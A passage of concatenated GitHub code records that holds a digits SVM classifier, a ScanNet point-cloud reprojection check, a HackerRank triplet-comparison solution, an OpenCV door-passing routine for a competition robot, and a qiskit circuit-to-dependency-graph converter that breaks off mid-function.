digits.target\nprint(df.head())\n\n#Creeating model\nX = df.drop([\"target\"],axis=\"columns\")\ny = df.target\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2)\n\nfrom sklearn.svm import SVC\nmodel = SVC()\nmodel.fit(X_train,y_train)\nprint(model.score(X_test,y_test))\n\n\n\n\n\n","repo_name":"sametaslnts/Digits-Prediction-Clustering-with-Support-Vector-Machine","sub_path":"DigitsDatasets.py","file_name":"DigitsDatasets.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30309041021","text":"'''Check the reprojection from 3D to 2D images\nAuthor: Zhao Na\nDate: Sep 2019\n'''\nimport os\nimport random\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport json\nfrom zipfile import ZipFile\nimport matplotlib.pyplot as plt\nfrom mayavi import mlab\nfrom vtk_visualizer.plot3d import *\nfrom vtk_visualizer import get_vtk_control\n\nimport scannet_utils\n\n\nif __name__ == '__main__':\n\n DATA_DIR = '/mnt/Data/Datasets/ScanNet_v2/scans/'\n\n # SCAN_NAMES = [line.rstrip() for line in open('/mnt/Data/Datasets/ScanNet_v1/sceneid_sort.txt')]\n SCAN_NAMES = ['scene0000_00']\n\n for scan_id, scan_name in enumerate(SCAN_NAMES):\n print('====== Process {0}-th scan [{1}] ======'.format(scan_id, scan_name))\n scan_path = os.path.join(DATA_DIR, scan_name)\n\n # parse the camera intrinsic file\n ## WHY the parameters from intrinsic_color.txt are different from those in scene_id.txt file??\n ## The one in scene_id.txt should be after camera calibration (undistortion)\n\n # ### Load from intrinsic_color.txt\n # camera_intrinsic_path = os.path.join(scan_path, 'intrinsic', 'intrinsic_color.txt')\n # camera_intrinsic = np.loadtxt(camera_intrinsic_path)[:3,:]\n\n ### Load from scene_id.txt\n meta_file = os.path.join(scan_path, '{0}.txt'.format(scan_name))\n camera_intrinsic = scannet_utils.read_camera_intrinsic(meta_file)\n\n # parse the mesh file\n mesh_file = os.path.join(scan_path, '{0}_vh_clean_2.ply'.format(scan_name))\n mesh_vertices = scannet_utils.read_mesh_vertices_rgb(mesh_file)\n\n ## visualize-1\n # plotxyzrgb(mesh_vertices, block=True)\n\n ## visualize-2\n fig = mlab.figure(figure=None, bgcolor=(0, 0, 0), fgcolor=None, engine=None, size=(1000, 1000))\n mlab.points3d(mesh_vertices[:, 0], mesh_vertices[:, 1], mesh_vertices[:, 2], mesh_vertices[:, 2], mode='point',\n colormap='gnuplot', figure=fig)\n mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='sphere', scale_factor=0.3)\n mlab.orientation_axes()\n mlab.show()\n\n pts = np.ones((mesh_vertices.shape[0], 4))\n pts[:, 0:3] = mesh_vertices[:, 0:3]\n\n framenames = os.listdir(os.path.join(scan_path, 'color'))\n for frame_idx in framenames:\n instance_img_path = os.path.join(scan_path, 'instance-filt', '{0}.png'.format(frame_idx))\n\n ## the matrix in /pose/.txt is to map the camera coord to world coord\n camera_extrinsic_path = os.path.join(scan_path, 'pose', '{0}.txt'.format(frame_idx))\n camera_extrinsic = np.loadtxt(camera_extrinsic_path) #4*4\n # transform from world coordinate to camera coordinate\n pts_camera = np.dot(pts, np.linalg.inv(camera_extrinsic).transpose()) #N*4\n\n ## visualize-1\n vtkControl = get_vtk_control(True)\n plotxyzrgb(np.hstack((pts_camera[:,:3], mesh_vertices[:,3:6])))\n vtkControl.AddAxesActor(1.0)\n vtkControl.exec_()\n\n ## visualize-2\n # fig = mlab.figure(figure=None, bgcolor=(0,0,0), fgcolor=None, engine=None, size=(1000, 1000))\n # mlab.points3d(pts_camera[:, 0], pts_camera[:, 1], pts_camera[:, 2], pts_camera[:, 2], mode='point',\n # colormap='gnuplot', figure=fig)\n # mlab.points3d(0, 0, 0, color=(1, 1, 1), mode='sphere', scale_factor=0.3)\n # mlab.orientation_axes()\n # mlab.show()\n\n # transform from camera coordinate to pixel coordinate\n pts_pixel = np.dot(pts_camera, camera_intrinsic.transpose()) #N*3\n pts_pixel[:, 0] /= pts_pixel[:, 2]\n pts_pixel[:, 1] /= pts_pixel[:, 2]\n valid_mask = (pts_pixel[:,0] >= 0) & (pts_pixel[:,0]<=1296) & (pts_pixel[:,1]>=0)& (pts_pixel[:,1]<=968) \\\n & (pts_pixel[:,2]>0)\n pts_image = pts_pixel[valid_mask, :]\n depth = pts_image[:,2]\n plotxyzrgb(np.hstack((pts_image, mesh_vertices[valid_mask, 3:6])), block=True)\n\n # visualize the reprojected points on color frame\n rgb_img = instance_img_path.replace('instance-filt', 'color').replace('png', 'jpg')\n rgb_img = cv2.imread(rgb_img)\n rgb_img = cv2.cvtColor(rgb_img, cv2.COLOR_BGR2RGB)\n\n cmap = plt.cm.get_cmap('hsv', 256)\n cmap = np.array([cmap(i) for i in range(256)])[:, :3] * 255\n\n for i in range(pts_image.shape[0]):\n d = depth[i]\n color = cmap[int(120.0 / d), :]\n cv2.circle(rgb_img, (int(np.round(pts_image[i, 0])), int(np.round(pts_image[i, 1]))), 2,\n color=tuple(color), thickness=-1)\n Image.fromarray(rgb_img).show()","repo_name":"Na-Z/3DMVGOD","sub_path":"data/scannet/check_reprojection.py","file_name":"check_reprojection.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"8707568988","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 6 10:22:29 2020\n\n@author: suryakantkumar\n\"\"\"\n\n'''\nProblem : Alice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, \nawarding points on a scale from 1 to 100 for three categories: problem clarity, originality, and difficulty.\n\nWe define the rating for Alice's challenge to be the triplet a = (a[0], a[1], a[2]), \nand the rating for Bob's challenge to be the triplet b = (b[0], b[1], b[2]).\n\nYour task is to find their comparison points by comparing a[0] with b[0], a[1] with b[1], and a[2] with b[2].\n\nIf a[i] > b[i], then Alice is awarded 1 point.\nIf a[i] < b[i], then Bob is awarded 1 point.\nIf a[i] = b[i], then neither person receives a point.\nComparison points is the total points a person earned.\n\nGiven a and b, determine their respective comparison points.\n\nFor example, a = [1, 2, 3] and b = [3, 2, 1]. For elements 0, Bob is awarded a point because a[0] < b[0]. \nFor the equal elements a[1] and b[1], no points are earned. Finally, for elements 2, a[2] > b[2] so Alice receives a point. \nYour return array would be [1, 1] with Alice's score first and Bob's second.\n'''\n\n\nimport os\n\ndef compareTriplets(a, b):\n point_a = 0\n point_b = 0\n \n for i in range(len(a)):\n if a[i] > b[i]:\n point_a += 1\n \n elif a[i] < b[i]:\n point_b += 1\n \n return point_a, point_b\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n a = list(map(int, input().rstrip().split()))\n b = list(map(int, input().rstrip().split()))\n result = compareTriplets(a, b)\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n fptr.close()\n \n","repo_name":"SuryakantKumar/HackerRank-Problem-Solving","sub_path":"Easy Level/Compare-The-Triplets.py","file_name":"Compare-The-Triplets.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13415211559","text":"# ###################### 过 门-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-\ndoor_flag = True\nAngle = 0\nangle_top = 0\nBottom_center_y = 0\nBottom_center_x = 0\nTop_center_x = 0\nTop_center_y = 0\nTop_lenth = 0\ncamera_choice = \"Head\"\n\n\ndef door_act_move():\n global step, state, reset, skip\n global door_flag\n global real_test\n global camera_choice\n global Angle, angle_top, Bottom_center_y, Bottom_center_x, Top_center_y, Top_center_x, Top_lenth \n \n step0_far = 130\n step0_close = 24\n step0_angle_top_R = -8\n step0_angle_top_L = 8\n step0_top_center_x_L = 365\n step0_top_center_x_R = 315\n step0_delta = 30 \n step0_turn_times = 3\n\n step1_angle_top_L = 3\n step1_angle_top_R = -3\n step1_head_bottom_x_F = 310\n step1_head_bottom_x_B = 340\n step1_delta = 20\n step1_close = 375\n\n step2_get_close = 5\n\n if step == 0: # 接近 看下边沿 角度 Chest_percent > 5\n if door_flag == False:\n print(\"1346L step=0 什么也没有看到,向左转45° turn005L\")\n if real_test:\n action_append(\"turn005L\")\n time.sleep(sleep_time_s)\n\n elif Top_center_y > 160:\n print(\"1352L step = 0 距离门很远, 快走靠近 fastForward03 Top_center_y={} > 150\".format(Top_center_y))\n if real_test:\n action_append(\"fast_forward_step\")\n action_append(\"turn001R\")\n action_append(\"fast_forward_step\")\n time.sleep(sleep_time_l)\n\n elif Top_center_y > step0_far:\n print(\"1360L step = 0 再往前一些,慢走 fast_forward_step Top_center_y={} > {}\".format(Top_center_y, step0_far))\n if real_test:\n action_append(\"fast_forward_step\")\n time.sleep(sleep_time_l)\n\n elif Top_center_y < step0_close:\n print(\"1366L step = 0 距离门很近了, 后退一点 Back2Run Top_center_y={} < {}\".format(Top_center_y, step0_close))\n if real_test:\n action_append(\"Back2Run\")\n time.sleep(sleep_time_l)\n\n elif angle_top < step0_angle_top_R:\n print(\"1372L step = 0 方向偏了, 向左转 turn001L angel_top = {} < {}\".format(angle_top, step0_angle_top_R))\n if real_test:\n action_append(\"turn001L\")\n\n elif angle_top > step0_angle_top_L:\n print(\"1377L step = 0 方向偏了, 向右转 turn001R angel_top = {} > {}\".format(angle_top, step0_angle_top_L))\n if real_test:\n action_append(\"turn001R\")\n\n elif Top_center_x > step0_top_center_x_L:\n if Top_center_x > step0_top_center_x_L + step0_delta:\n print(\"1383L step = 0 站位很偏了, 向右移, Right3move Top_center_x = {} > {}\".format(Top_center_x, step0_top_center_x_L+step0_delta))\n if real_test:\n action_append(\"Right3move\")\n time.sleep(sleep_time_s)\n else:\n print(\"1388L step = 0 站位偏了, 向右移, Right2move Top_center_x = {} > {}\".format(Top_center_x, step0_top_center_x_L))\n if real_test:\n action_append(\"Right02move\")\n time.sleep(sleep_time_s)\n elif Top_center_x < step0_top_center_x_R:\n if Top_center_x < step0_top_center_x_R - step0_delta:\n print(\"1394L step = 0 站位很偏了, 向左移, Left3move Top_center_x = {} < {}\".format(Top_center_x, step0_top_center_x_R - step0_delta))\n if real_test:\n action_append(\"Left3move\")\n time.sleep(sleep_time_s)\n else:\n print(\"1399L step = 0 站位偏了, 向左移, Left02move Top_center_x = {} < {}\".format(Top_center_x, step0_top_center_x_R))\n if real_test:\n action_append(\"Left02move\")\n time.sleep(sleep_time_s)\n\n else:\n print(\"1405L 进入下一阶段, 调整侧身 turn005R x {} HeadTurn185\".format(step0_turn_times))\n # cv2.waitKey(0)\n if real_test:\n for i in range(0, step0_turn_times):\n action_append(\"turn005R\")\n time.sleep(sleep_time_l)\n\n # action_append(\"turn004R\")\n # action_append(\"turn001R\")\n # action_append(\"turn001R\")\n action_append(\"HeadTurn185\")\n time.sleep(sleep_time_l)\n step = 1\n \n elif step == 1:\n if Top_lenth < 100:\n print(\"1421L 歪了! 左转, 再向右移\")\n if real_test:\n action_append(\"Back1Run\")\n action_append(\"Right02move\")\n\n elif angle_top > step1_angle_top_L or 0 < Angle < 85:\n print(\"1427L step = 1, 方向偏了, 向右转 turn000R angle_top={} > {}\".format(angle_top, step1_angle_top_L))\n if real_test:\n action_append(\"turn001R\")\n time.sleep(sleep_time_l)\n elif angle_top < step1_angle_top_R or -85 < Angle < 0 :\n print(\"1432L step = 1 方向偏了, 向左转 turn000L angle_top={} < {}\".format(angle_top, step1_angle_top_R))\n if real_test:\n action_append(\"turn001L\")\n time.sleep(sleep_time_l)\n \n elif Bottom_center_x < step1_head_bottom_x_F:\n if Bottom_center_x < step1_head_bottom_x_F - step1_delta:\n print(\"1439L step = 1 站位很靠前了,向后移 Back2Run Bottom_center_x={} < {}\".format(Bottom_center_x, step1_head_bottom_x_F - step1_delta))\n if real_test:\n action_append(\"Back2Run\")\n time.sleep(sleep_time_s)\n else:\n print(\"1444L step = 1 站位靠前了,向后移 Back1Run Bottom_center_x={} < {}\".format(Bottom_center_x, step1_head_bottom_x_F))\n if real_test:\n action_append(\"Back1Run\")\n time.sleep(sleep_time_s)\n \n elif Bottom_center_x > step1_head_bottom_x_B:\n if Bottom_center_x > step1_head_bottom_x_B + step1_delta:\n print(\"1451L step = 1 站位很靠后了,向前移 Forwalk01 Bottom_center_x={} > {}\".format(Bottom_center_x, step1_head_bottom_x_B + step1_delta))\n if real_test:\n action_append(\"Forwalk01\")\n time.sleep(sleep_time_s)\n else:\n print(\"1456L step = 1 站位靠后了,向前移 Forwalk01 Bottom_center_x={} > {}\".format(Bottom_center_x, step1_head_bottom_x_B))\n if real_test:\n action_append(\"Forwalk01\")\n time.sleep(sleep_time_s)\n\n elif Bottom_center_y < step1_close:\n print(\"1462L step = 1, 靠近门, Left3move Bottom_center_y={} < {}\".format(Bottom_center_y, step1_close))\n if real_test:\n action_append(\"Left3move\")\n time.sleep(sleep_time_l)\n \n elif Bottom_center_y > step1_close:\n print(\"1468L 已经接近门了,进入下一阶段,摸黑过门, Bottom_center_y = {} > {}\".format(Bottom_center_y, step1_close))\n step = 2\n\n elif step == 2:\n print(\"-------/////////////////过门 Left3move x 4\")\n # action_append(\"Back2Run\")\n for i in range(0, step2_get_close):\n if real_test:\n action_append(\"Left3move\")\n time.sleep(sleep_time_l)\n # print(\"向后退一点! Back1Run\")\n # if real_test:\n # action_append(\"Back1Run\")\n\n # cv2.waitKey(0)\n\n for i in range(0, 7):\n if real_test:\n action_append(\"Left3move\")\n if i==3:\n action_append(\"turn001R\")\n action_append(\"turn001R\")\n time.sleep(sleep_time_l)\n\n # cv2.waitKey(0)\n\n print(\"完成! \")\n\n if real_test:\n for i in range(0, step0_turn_times):\n action_append(\"turn005L\")\n time.sleep(sleep_time_l)\n action_append(\"HeadTurnMM\")\n action_append(\"fast_forward_step\")\n \n state = -1\n\n\ndef into_the_door():\n global state_sel, org_img, step, reset, skip, debug, chest_ret, HeadOrg_img, state\n global door_flag\n global camera_choice\n global Angle, angle_top, Bottom_center_y, Bottom_center_x, Top_center_x, Top_center_y, Top_lenth\n step = 0\n state = 5\n\n\n r_w = chest_r_width\n r_h = chest_r_height\n \n\n print(\"/-/-/-/-/-/-/-/-/-开始过门\")\n\n while(state == 5):\n Area = []\n if camera_choice == \"Chest\":\n # print(\"胸部相机\")\n chest_OrgFrame = np.rot90(ChestOrg_img)\n Img_copy = chest_OrgFrame.copy()\n\n elif camera_choice == \"Head\":\n # print(\"头部相机\")\n Img_copy = HeadOrg_img.copy()\n # Img_copy = cv2.resize(border, (r_w, r_h), interpolation=cv2.INTER_CUBIC)\n # Img_copy = Head_OrgFrame\n \n \n Frame_gauss = cv2.GaussianBlur(Img_copy, (3, 3), 0) # 高斯模糊\n Frame_hsv = cv2.cvtColor(Frame_gauss, cv2.COLOR_BGR2HSV) # 将图片转换到HSV空间\n if camera_choice == \"Chest\":\n Frame_blue = cv2.inRange(Frame_hsv, color_range['chest_blue_door'][0], color_range['chest_blue_door'][1]) # 对原图像和掩模(颜色的字典)进行位运算\n elif camera_choice == \"Head\":\n Frame_blue = cv2.inRange(Frame_hsv, color_range['head_blue_door'][0], color_range['head_blue_door'][1]) # 对原图像和掩模(颜色的字典)进行位运算\n Opened = cv2.morphologyEx(Frame_blue, cv2.MORPH_OPEN, np.ones((1, 1), np.uint8)) # 开运算 去噪点\n Closed = cv2.morphologyEx(Opened, cv2.MORPH_CLOSE, np.ones((5, 5), np.uint8)) # 闭运算 封闭连接\n Closed = cv2.dilate(Closed, np.ones((5, 5), np.uint8), iterations=3)\n if img_debug:\n cv2.imshow(\"Imask\", Closed)\n\n _, contours, hierarchy = cv2.findContours(Closed, cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE) # 找出轮廓cv2.CHAIN_APPROX_NONE\n\n if len(contours) == 0:\n print(\"没有找到门!\")\n door_flag = False\n \n else:\n door_flag = True\n for i in range(0,len(contours)):\n #print(\"len[Chest_contours]={}——i:{}\".format(len(Chest_contours), i))\n area = cv2.contourArea(contours[i])\n if 2000 < area < 640 * 480 * 0.45:\n Area.append((area,i))\n \n # print(\"area{} = {}\".format(i, area))\n # cv2.imshow(\"Processed\", Img_copy)\n # cv2.waitKey(0)\n # cv2.drawContours(Img_copy, contours, -1, (0, 0, 255), 1)\n\n AreaMaxContour, Area_max = getAreaMaxContour1(contours)\n\n\n if step != 2 and camera_choice == \"Head\":\n Rect = cv2.minAreaRect(AreaMaxContour)\n Box = np.int0(cv2.boxPoints(Rect))\n\n cv2.drawContours(Img_copy, [Box], -1, (255, 200, 100), 2)\n\n Top_left = AreaMaxContour[0][0]\n Top_right = AreaMaxContour[0][0]\n Bottom_left = AreaMaxContour[0][0]\n Bottom_right = AreaMaxContour[0][0]\n for c in AreaMaxContour: # 遍历找到四个顶点\n if c[0][0] + 1.5 * c[0][1] < Top_left[0] + 1.5 * Top_left[1]:\n Top_left = c[0]\n if (r_w - c[0][0]) + 1.5 * c[0][1] < (r_w - Top_right[0]) + 1.5 * Top_right[1]:\n Top_right = c[0]\n if c[0][0] + 1.5 * (r_h - c[0][1]) < Bottom_left[0] + 1.5 * (r_h - Bottom_left[1]):\n Bottom_left = c[0]\n if c[0][0] + 1.5 * c[0][1] > Bottom_right[0] + 1.5 * Bottom_right[1]:\n Bottom_right = c[0]\n\n angle_top = - math.atan(\n (Top_right[1] - Top_left[1]) / (Top_right[0] - Top_left[0])) * 180.0 / math.pi\n\n Top_lenth = abs(Top_right[0] - Top_left[0])\n Top_center_x = int((Top_right[0] + Top_left[0]) / 2)\n Top_center_y = int((Top_right[1] + Top_left[1]) / 2)\n Bottom_center_x = int((Bottom_right[0] + Bottom_left[0]) / 2)\n Bottom_center_y = int((Bottom_right[1] + Bottom_left[1]) / 2)\n\n cv2.circle(Img_copy, (Top_right[0], Top_right[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Top_left[0], Top_left[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Bottom_right[0], Bottom_right[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Bottom_left[0], Bottom_left[1]), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Top_center_x, Top_center_y), 5, [0, 255, 255], 2)\n cv2.circle(Img_copy, (Bottom_center_x, Bottom_center_y), 5, [0, 255, 255], 2)\n cv2.line(Img_copy, (Top_center_x, Top_center_y),\n (Bottom_center_x, Bottom_center_y), [0, 255, 255], 2) # 画出上下中点连线\n \n if math.fabs(Top_center_x - Bottom_center_x) <= 1: # 得到连线的角度\n Angle = 90\n else:\n Angle = - math.atan((Top_center_y - Bottom_center_y) / (\n Top_center_x - Bottom_center_x)) * 180.0 / math.pi\n\n\n if img_debug:\n cv2.putText(Img_copy, \"angle_top:\" + str(int(angle_top)), (30, 425), cv2.FONT_HERSHEY_SIMPLEX, 0.65,(0, 0, 255), 2)\n cv2.putText(Img_copy, \"Head_bottom_center(x,y): \" + str(int(Bottom_center_x)) + \" , \" + str(int(Bottom_center_y)), (30, 450), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n cv2.putText(Img_copy,\"Head_top_center(x,y): \" + str(int(Top_center_x)) + \" , \" + str(int(Top_center_y)),(30, 470), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n cv2.putText(Img_copy, \"Angle:\" + str(int(Angle)), (30, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n cv2.putText(Img_copy, \"Top_lenth:\" + str(int(Top_lenth)), (400, 20), cv2.FONT_HERSHEY_SIMPLEX,0.65, (0, 0, 255), 2) # (0, 0, 255)BGR\n\n if img_debug:\n cv2.imshow(\"Processed\", Img_copy)\n cv2.waitKey(10)\n\n door_act_move()\n print(\"state={}\".format(state))\n\n \n\n # if len(Area) > 2:\n # Area = find_two(Area)\n \n # elif len(Area) < 2:\n # door_found = False\n # print(\"没有发现门框,调用头部相机\")\n # camera_choice = \"Head\"\n # # cv2.drawContours(Img_copy, Chest_contours[Area[0][1]], -1, (0, 0, 255), 1)\n\n # if len(Area) == 2:\n # door_found = True\n # Chest_rect1 = cv2.minAreaRect(Chest_contours[Area[0][1]])\n # Chest_box1 = np.int0(cv2.boxPoints(Chest_rect1))\n # Chest_rect2 = cv2.minAreaRect(Chest_contours[Area[1][1]])\n # Chest_box2 = np.int0(cv2.boxPoints(Chest_rect2))\n\n # cv2.drawContours(Img_copy, [Chest_box1], -1, (255, 200, 100), 2)\n # cv2.drawContours(Img_copy, [Chest_box2], -1, (255, 200, 100), 2)\n\n # Chest_top_left1 = Chest_contours[Area[0][1]][0][0]\n # Chest_top_right1 = Chest_contours[Area[0][1]][0][0]\n # Chest_bottom_left1 = Chest_contours[Area[0][1]][0][0]\n # Chest_bottom_right1 = Chest_contours[Area[0][1]][0][0]\n # for c in Chest_contours[Area[0][1]]: # 遍历找到四个顶点\n # if c[0][0] + 1.5 * c[0][1] < Chest_top_left1[0] + 1.5 * Chest_top_left1[1]:\n # Chest_top_left1 = c[0]\n # if (r_w - c[0][0]) + 1.5 * c[0][1] < (r_w - Chest_top_right1[0]) + 1.5 * Chest_top_right1[1]:\n # Chest_top_right1 = c[0]\n # if c[0][0] + 1.5 * (r_h - c[0][1]) < Chest_bottom_left1[0] + 1.5 * (r_h - Chest_bottom_left1[1]):\n # Chest_bottom_left1 = c[0]\n # if c[0][0] + 1.5 * c[0][1] > Chest_bottom_right1[0] + 1.5 * Chest_bottom_right1[1]:\n # Chest_bottom_right1 = c[0]\n # cv2.circle(Img_copy, (Chest_top_right1[0], Chest_top_right1[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_top_left1[0], Chest_top_left1[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_right1[0], Chest_bottom_right1[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_left1[0], Chest_bottom_left1[1]), 5, [0, 255, 255], 2)\n # angle_Right = - math.atan(\n # (Chest_top_left1[1] - Chest_bottom_left1[1]) / (Chest_top_left1[0] - Chest_bottom_left1[0])) * 180.0 / math.pi\n\n\n # Chest_top_left2 = Chest_contours[Area[1][1]][0][0]\n # Chest_top_right2 = Chest_contours[Area[1][1]][0][0]\n # Chest_bottom_left2 = Chest_contours[Area[1][1]][0][0]\n # Chest_bottom_right2 = Chest_contours[Area[1][1]][0][0]\n # for c in Chest_contours[Area[1][1]]: # 遍历找到四个顶点\n # if c[0][0] + 1.5 * c[0][1] < Chest_top_left2[0] + 1.5 * Chest_top_left2[1]:\n # Chest_top_left2 = c[0]\n # if (r_w - c[0][0]) + 1.5 * c[0][1] < (r_w - Chest_top_right2[0]) + 1.5 * Chest_top_right2[1]:\n # Chest_top_right2 = c[0]\n # if c[0][0] + 1.5 * (r_h - c[0][1]) < Chest_bottom_left2[0] + 1.5 * (r_h - Chest_bottom_left2[1]):\n # Chest_bottom_left2 = c[0]\n # if c[0][0] + 1.5 * c[0][1] > Chest_bottom_right2[0] + 1.5 * Chest_bottom_right2[1]:\n # Chest_bottom_right2 = c[0]\n # cv2.circle(Img_copy, (Chest_top_right2[0], Chest_top_right2[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_top_left2[0], Chest_top_left2[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_right2[0], Chest_bottom_right2[1]), 5, [0, 255, 255], 2)\n # cv2.circle(Img_copy, (Chest_bottom_left2[0], Chest_bottom_left2[1]), 5, [0, 255, 255], 2)\n # angle_Left = - math.atan(\n # (Chest_top_right2[1] - Chest_bottom_right2[1]) / (Chest_top_right2[0] - Chest_bottom_right2[0])) * 180.0 / math.pi\n \n # Chest_top_center_x = int((Chest_top_right2[0] + Chest_top_left1[0]) / 2)\n # Chest_top_center_y = int((Chest_top_right2[1] + Chest_top_left1[1]) / 2)\n # cv2.circle(Img_copy, (Chest_top_center_x, Chest_top_center_y), 5, [0, 255, 255], 2)\n\n # cv2.putText(Img_copy, \"Chest_top_center(x,y): \" + str(int(Chest_top_center_x)) + \" , \" + str(\n # int(Chest_top_center_y)), (30, 400), cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 0, 255), 2)\n # cv2.putText(Img_copy, \"angle_left:\" + str(int(angle_Left)), (30, 425), cv2.FONT_HERSHEY_SIMPLEX, 0.65,\n # (0, 0, 255), 2) # (0, 0, 255)BGR\n # cv2.putText(Img_copy, \"angle_right:\" + str(int(angle_Right)), (30, 460), cv2.FONT_HERSHEY_SIMPLEX,\n # 0.65, (0, 0, 255), 2)","repo_name":"personqianduixue/2021-Running-Robot","sub_path":"RunningRobot/yky/过门(哈工深).py","file_name":"过门(哈工深).py","file_ext":"py","file_size_in_byte":19303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38752525999","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 28 12:37:42 2020\n\n@author: zxz58\n\"\"\"\nimport networkx as nx\nfrom cir_input.qasm import CreateCircuitFromQASM\nfrom qiskit.quantum_info.operators import Operator\nfrom cir_input.gate_operation import OperationCNOT, OperationSingle\nimport numpy as np\n\ndef CreateDGfromQASMfile(QASM_file, path,\n flag_single=True,\n flag_interaction=False):\n '''\n convert QASM file to cir and DG\n \n DG is a directed graph where each node represents a quantum gate and egde\n dependency\n if you want to get the u_matrix of a node i,\n use DG.nodes[i]['operation'].u_matrix\n \n if you want to get a list of node i in whcih each element represents\n the qubit index where the gate in node i operates,\n use DG.nodes[i]['operation'].involve_qubits_list\n \n if you want to get the qiskit gate data of a node i,\n use DG.nodes[i]['operation'].qiskit_data\n \n flag_single: whether we should convert single qubit gate\n flag_interaction: whether we should generate interaction matrix in which\n each entry represents # CNOT between column and raw qubits. It can be\n invoked by 'DG.interaction_matrix'\n output:\n circuit, (DG, num_unidentified_gates)\n '''\n cir = CreateCircuitFromQASM(QASM_file, path)\n res = QiskitCircuitToDG(cir, flag_single, flag_interaction)\n return cir, res\n\ndef QiskitCircuitToDG(cir, flag_single=False, flag_interaction=False):\n '''\n convert Qiskit circuit to DG\n support only CNOT and single qubit gates\n flag_single: whether we should convert single qubit gate\n '''\n operations = []\n num_unidentified_gates = 0\n qregs = cir.qregs\n if len(qregs) > 1:\n raise Exception('quantum circuit has more than 1 quantum register')\n q = qregs[0]\n interaction_matrix = np.zeros((len(q), len(q))) if flag_interaction == True else None\n data = cir.data\n for gate in data:\n if flag_interaction == True:\n if len(gate[1]) == 2:\n interaction_matrix[gate[1][0].index][gate[1][1].index] += 1\n interaction_matrix[gate[1][1].index][gate[1][0].index] += 1\n operation = QiskitGateToOperation(gate, flag_single)\n operation.qiskit_data = gate\n if operation == None:\n num_unidentified_gates += 1\n else:\n operations.append(operation)\n GenerateDependency(operations, q.size)\n DG = OperationToDependencyGraph(operations)\n DG.interaction_matrix = interaction_matrix\n return DG, num_unidentified_gates\n\ndef QiskitGateToOperation(Gate, flag_single=False):\n '''\n ATTENTION: The input gate should only be cx or single-qubit gates\n convert a Qiskit Gate object to OperationU\n only support CNOT and single qubit gates\n flag_single: whether we should convert single qubit gate\n '''\n\n '''old qiskit version'''\n# =============================================================================\n# if Gate.name == 'cx':\n# qargs = Gate.qargs\n# return OperationCNOT(qargs[0], qargs[1])\n# =============================================================================\n '''new qiskit version'''\n if Gate[0].name == 'cx':\n qargs = Gate[1]\n return OperationCNOT(qargs[0].index, qargs[1].index)\n else:\n if flag_single == True:\n '''convert single-qbuit gate'''\n qiskit_gate = Gate[0]\n u_matrix = Operator(qiskit_gate).data\n qargs = Gate[1]\n if len(qargs) == 1:\n return OperationSingle(qargs[0].index, u_matrix=u_matrix,name=Gate[0].name) \n return None\n\ndef GenerateDependency(operations, num_q):\n '''Generate Dependency to operations according to the order'''\n dic = {}\n for i in range(num_q):\n dic[i] = None\n \n for operation in operations:\n qubits = operation.involve_qubits\n for q in qubits:\n if isinstance(q, int): q = [int(q), int(q)]\n if dic[q[1]] == None:\n dic[q[1]] = operation\n else:\n dependent_operation = dic[q[1]]\n if not dependent_operation in operation.dependent_operations:\n operation.dependent_operations.append(dependent_operation)\n dic[q[1]] = operation\n\ndef OperationToDependencyGraph(operations):\n '''\n create dependency graph\n input:\n operations a list of all operations instances\n '''\n first_gates = [-1]*50 #a list in which each element is the node that takes the first place of qubits\n \n num_vertex = len(operations)\n DG = nx.DiGraph()\n num_q_log = 0\n DG.add_nodes_from(list(range(num_vertex)))\n for i in range(num_vertex):\n current_operation = operations[i]\n qubits = current_operation.InvolveQubitsList()\n for qubit in qubits:\n if first_gates[qubit] == -1: first_gates[qubit] = i\n if qubit + 1 > num_q_log: num_q_log = qubit + 1\n DG.add_node(i, operation = current_operation)\n if current_operation.dependent_operations != []:\n DG.add_node(i, root = False)\n for current_de in current_operation.dependent_operations:\n DG.add_edge(operations.index(current_de), i)\n else:\n DG.add_node(i, root = True)\n DG.first_gates = first_gates\n DG.num_q_log = num_q_log\n return DG\n\ndef FindExecutableNode(dependency_graph,\n executed_vertex=None,\n executable_vertex=None,\n removed_vertexes=None):\n '''\n WHEN executable_vertex = None:\n Use dependency graph to find the executable vertexes/nodes, i.e., nodes\n in current level\n return:\n executable_nodes: a list of nodes. If no executable node, return []\n WHEN both executed_vertex and executable_vertex != None:\n only update executed_vertex and executable_vertex according to newly\n executed gates (removed_vertexes)\n return:\n 